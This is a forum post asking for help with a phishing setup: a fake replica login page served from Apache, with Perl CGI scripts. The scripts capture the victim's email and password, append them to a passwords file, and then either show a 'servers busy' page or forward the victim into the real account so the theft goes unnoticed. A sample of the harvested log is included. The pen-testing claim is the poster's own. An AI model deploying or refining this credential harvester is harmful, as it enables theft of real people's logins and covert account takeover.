Hi all, straight to the point: I am a security pen tester, and I have come to a bit of a sticking point in a project that I think someone here may be able to help with.
I have a fake replica login page that is served locally from Apache. The login action links to a CGI/HTML script, and the script stores the victim's login details. This all works fine; the problem is that the CGI/HTML page just shows a message:
"Sorry, our servers are busy, please try again later." The victim's details are logged, but instead of the victim being shown this page/message, I am trying to forward the STDIN information and log them straight into their account so they would be none the wiser.
Below is the original CGI script that shows the obvious "our servers are busy" page.
Below that is my modified CGI script, the one I am having problems with.
At the bottom is the output of the stored file.
The original CGI script, which throws the "server busy" page and stores the victim's details:
#!perl
# chmod +x this file and stick it in your cgi-bin directory
# CHANGE THESE VARIABLES $page_title $page_message $page_image
use strict;
use warnings;

my $page_title   = "BUSY SERVERS";
my $page_message = "SORRY IT LOOKS LIKE OUR SERVERS ARE BUSY TRY LATER";
my $page_image   = "SERVER.jpg";

print "Content-type:text/html\n\n";

# Read the POSTed form body and decode it into %FORM
my $buffer = '';
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'} || 0);
my %FORM;
foreach my $pair (split(/&/, $buffer)) {
    # limit to 2 fields so a value containing '=' is not truncated
    my ($name, $value) = split(/=/, $pair, 2);
    $value = '' unless defined $value;
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $FORM{$name} = $value;
}

my $file = "/passwords.txt";   # the web server user must be able to write here
open(MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach my $key (keys %FORM) {
    print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# return HTML message to user
print "<html><head><title>$page_title</title></head><body>";
print "<center>";
print "<img src=\"/$page_image\"><br><br>";
print "$page_message<br><br>\n";
print "</center></body></html>";

# print an error page and stop (called above but never defined in the original)
sub dienice {
    my ($msg) = @_;
    print "<h2>Error</h2>\n$msg\n</body></html>";
    exit;
}
Here is what the saved password file looks like:
url = Backtrack Railway Services, form_charset = UTF-8, login_params = , login_cmd = , submit.x = Log In, login_email = Backtrack@hotmail.com, login_password = backtrack1, target_page = 0
Here is the modified CGI script, the one I am having trouble with, the one that needs to store the password and forward the victim to their account:
#!perl
# chmod +x this file and stick it in your cgi-bin directory
use strict;
use warnings;

print "Content-type:text/html\n\n";

# Read the POSTed form body and decode it into %FORM
my $buffer = '';
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'} || 0);
my %FORM;
foreach my $pair (split(/&/, $buffer)) {
    my ($name, $value) = split(/=/, $pair, 2);   # keep any '=' inside the value
    $value = '' unless defined $value;
    $value =~ tr/+/ /;
    $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    $FORM{$name} = $value;
}

my $file = "/passwords.txt";   # the web server user must be able to write here
open(MAIL, ">>$file") or dienice("Can't access $file!\n");
print MAIL "\nurl = $ENV{'SERVER_NAME'}";
foreach my $key (keys %FORM) {
    print MAIL ", $key = $FORM{$key}";
}
close(MAIL);

# Re-present the captured values in a form pointing at the real login.
# The original put raw HTML here outside any print (a syntax error) and used
# $key and $FORM, which are not the captured fields; a here-document fixes both.
my $page  = '';   # value the target expects; not given in the post
my $email = html_escape($FORM{'login_email'}    || '');
my $pass  = html_escape($FORM{'login_password'} || '');
print <<"HTML";
<html>
<body>
<form method="post" action="target login">
<input type="hidden" name="page" value="$page">
username: <input type="text" name="login_email" value="$email" size=10><br>
password: <input type="password" name="login_password" value="$pass" size=10><p>
<input type="submit" value="Log In">
</form>
</body>
</html>
HTML

# escape the characters that would break out of an HTML attribute value
sub html_escape {
    my ($s) = @_;
    $s =~ s/&/&amp;/g; $s =~ s/</&lt;/g; $s =~ s/>/&gt;/g; $s =~ s/"/&quot;/g;
    return $s;
}

sub dienice {
    my ($msg) = @_;
    print "<h2>Error</h2>\n$msg\n</body></html>";
    exit;
}
Cheers in advance to whoever may try to help.